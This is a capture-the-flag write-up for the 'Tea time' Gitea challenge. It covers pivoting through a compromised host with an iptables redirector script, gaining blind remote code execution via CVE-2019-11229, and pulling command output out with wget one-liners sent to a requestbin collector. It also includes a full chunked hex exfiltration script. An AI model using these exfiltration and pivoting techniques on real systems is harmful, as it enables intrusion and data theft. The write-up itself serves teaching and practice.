Tea time

Pentest, 20 points

Description

We lost access to our versioning server: the attacker removed our SSH keys. Please get it back and connect to the server using SSH to get the flag.

by Masterfox

Solution

This challenge was only reachable from a specific internal network. We could reach Tea time only through a machine compromised in a previous challenge, and at first only from its command line. After a few minutes, to work more comfortably, we set up iptables redirector rules on that machine, following https://www.ired.team/offensive-security/red-team-infrastructure/redirectors-forwarders, so that we could reach the challenge from our browsers.
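The redirector we used on the pivot is, in substance, a DNAT/MASQUERADE forward like the one below. This is an added example, not the original writeup's rules: the interface names, the target address and Gitea's port (3000) are assumptions, and with DRY_RUN=1 the functions print the iptables commands instead of applying them, so the rule logic can be checked without root.

```sh
#!/bin/sh
# Added example (not from the original writeup): a DNAT/MASQUERADE redirector
# on the compromised pivot host, in the spirit of the ired.team page linked
# above. Interfaces, addresses and the Gitea port are assumptions.
# With DRY_RUN=1 the commands are printed instead of executed.

PIVOT_IFACE="${PIVOT_IFACE:-eth0}"     # pivot interface facing our attack box (assumed)
LISTEN_PORT="${LISTEN_PORT:-3000}"     # port we connect to on the pivot
TARGET="${TARGET:-10.10.10.20}"        # Tea time host, assumed address
TARGET_PORT="${TARGET_PORT:-3000}"     # Gitea's HTTP port, assumed default
DRY_RUN="${DRY_RUN:-0}"

# Execute a command, or print it when DRY_RUN=1.
run() { if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }

# Rules that make the pivot forward LISTEN_PORT to TARGET:TARGET_PORT.
# $1 is the iptables action: -A to add the rules, -D to delete them again.
redirector() {
  act="$1"
  # Rewrite the destination of inbound connections to the real target.
  run iptables -t nat "$act" PREROUTING -i "$PIVOT_IFACE" -p tcp --dport "$LISTEN_PORT" \
      -j DNAT --to-destination "$TARGET:$TARGET_PORT"
  # Source-NAT so the target answers to the pivot rather than to an address it cannot reach.
  run iptables -t nat "$act" POSTROUTING -p tcp -d "$TARGET" --dport "$TARGET_PORT" -j MASQUERADE
  # Let the forwarded flow through FORWARD; a default-DROP policy would otherwise eat it.
  run iptables "$act" FORWARD -p tcp -d "$TARGET" --dport "$TARGET_PORT" -j ACCEPT
  run iptables "$act" FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
}

# Forwarding must be enabled in the kernel or DNAT'd packets go nowhere.
setup()    { run sysctl -w net.ipv4.ip_forward=1; redirector -A; }
teardown() { redirector -D; }

# Usage: sh redirector.sh up   (as root on the pivot)
#        sh redirector.sh down (remove the rules when done)
case "${1:-}" in
  up)   setup ;;
  down) teardown ;;
esac
```

Once the rules are in place, pointing a browser at the pivot's address on LISTEN_PORT reaches Gitea on the target; the teardown function removes exactly the rules that setup added, which matters on a machine that is not ours.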

First, we identified the Gitea version from its commit hash: the page footer shows Gitea Version: 73ce024. That commit, https://github.com/go-gitea/gitea/commit/73ce02400cec659bd7a7ee3798ff73a4c7c85957, corresponds to 1.8.0 RC2, released on 27 March 2019, so the instance is quite old. There are probably some public exploits we can use!

We first looked at Podalirius' exploit (https://www.exploit-db.com/exploits/49571), presented in his article https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/. After a few tries we realised we could not use it: that exploit needs a user who is allowed to edit Git hooks, and this Gitea configuration did not allow it.

Back to square one, we searched for another exploit. Thanks to https://www.cvedetails.com/ we found CVE-2019-11229, a code execution bug fixed in Gitea 1.8.0, so our release candidate should still be affected. This is interesting.

Thanks to https://www.exploit-db.com/exploits/49383, https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa and some manual crafting (notably modifying the exploit, because the server it was designed to stand up did not work properly for us), we got RCE on the Tea time machine. As the Knownsec analysis explains, the bug is that the mirror address of a repository is written into the repository's git config without sanitisation, so an attacker can inject arbitrary git configuration directives, which git then honours when the mirror is synchronised.

The execution was blind, though: nothing came back from our commands, so we had to design an exfiltration technique to retrieve their output. We hex-encoded the output (xxd -p wraps its output, hence the tr to drop the newlines) and sent it to a request collector as a query-string parameter. To list files and directories, for instance:

wget "http://requestbin.net/r/xxx?x=$(ls | xxd -p | tr -d '\n')"
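The one-liner above works for short output, but a long directory listing or a file dump quickly exceeds what fits in one URL. The script below is an added example, not code from the original writeup: it generalises the same hex-over-query-string trick by splitting the output into numbered chunks on the target and reordering and decoding them on the collector side. The collector URL is the page's own placeholder (an assumption), and send() prints the request instead of calling wget so the whole round trip runs offline.

```sh
#!/bin/sh
# Added example (not part of the original writeup): chunked hex exfiltration
# over HTTP GET query strings, plus the collector-side decoder.
# COLLECTOR is a placeholder (assumption). send() prints the request
# instead of calling wget so the round trip can be exercised offline.

COLLECTOR="http://requestbin.net/r/xxx"   # placeholder collector, assumption
CHUNK=60                                  # hex characters per request

# Hex-encode stdin as one line (portable equivalent of `xxd -p | tr -d '\n'`).
hexencode() { od -An -v -tx1 | tr -d ' \n'; }

# Decode one line of lowercase hex back to raw bytes without needing xxd.
hexdecode() {
  awk 'BEGIN { h = "0123456789abcdef" }
       { for (i = 1; i <= length($0); i += 2) {
           v = (index(h, substr($0, i, 1)) - 1) * 16 + index(h, substr($0, i + 1, 1)) - 1
           printf "%c", v
         } }'
}

# Target side: one request per chunk. On the real target the body would be:
#   wget -qO /dev/null "$1"
send() { printf '%s\n' "$1"; }

# Run a command on the target and exfiltrate its stdout and stderr.
# Each request carries a sequence number so the collector can reorder.
exfil() {
  hex=$("$@" 2>&1 | hexencode)
  n=0
  while [ -n "$hex" ]; do
    part=$(printf '%s' "$hex" | cut -c1-"$CHUNK")
    hex=$(printf '%s' "$hex" | cut -c"$((CHUNK + 1))"-)
    send "$COLLECTOR?i=$n&x=$part"
    n=$((n + 1))
  done
}

# Collector side: read the logged request URLs (in any order), sort by the
# sequence number, concatenate the hex and decode it.
reassemble() {
  sed -n 's/.*[?&]i=\([0-9]*\)&x=\([0-9a-f]*\).*/\1 \2/p' |
    sort -n -k1,1 |
    { while read -r seq part; do printf '%s' "$part"; done; echo; } |
    hexdecode
}

# Usage on the attack box, with the collector's request log saved to requests.txt:
#   reassemble < requests.txt
```

Hex is deliberately used rather than base64 because every character is URL-safe, so no encoding layer is needed on either side; the cost is a 2x expansion, which is why chunking matters for anything larger than a listing. Requests may arrive out of order or be retried, and sorting on the sequence number handles both.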

Okay, we have RCE; now back to what the challenge asks for. We assumed the flag would be displayed when logging in through SSH, either in the login banner or in the message of the day. After reading some documentation such as https://www.tecmint.com/protect-ssh-logins-with-ssh-motd-banner-messages/, we dumped the content of /etc/motd, the message shown after a successful SSH login, with the same exfiltration trick:

wget "http://requestbin.net/r/xxx?x=$(cat /etc/motd | xxd -p | tr -d '\n')"

It contained the flag NORZH{k33p_upd4t1ng_3Veryd4y}, so the RCE alone was enough: we never needed to restore the SSH keys and actually log in.
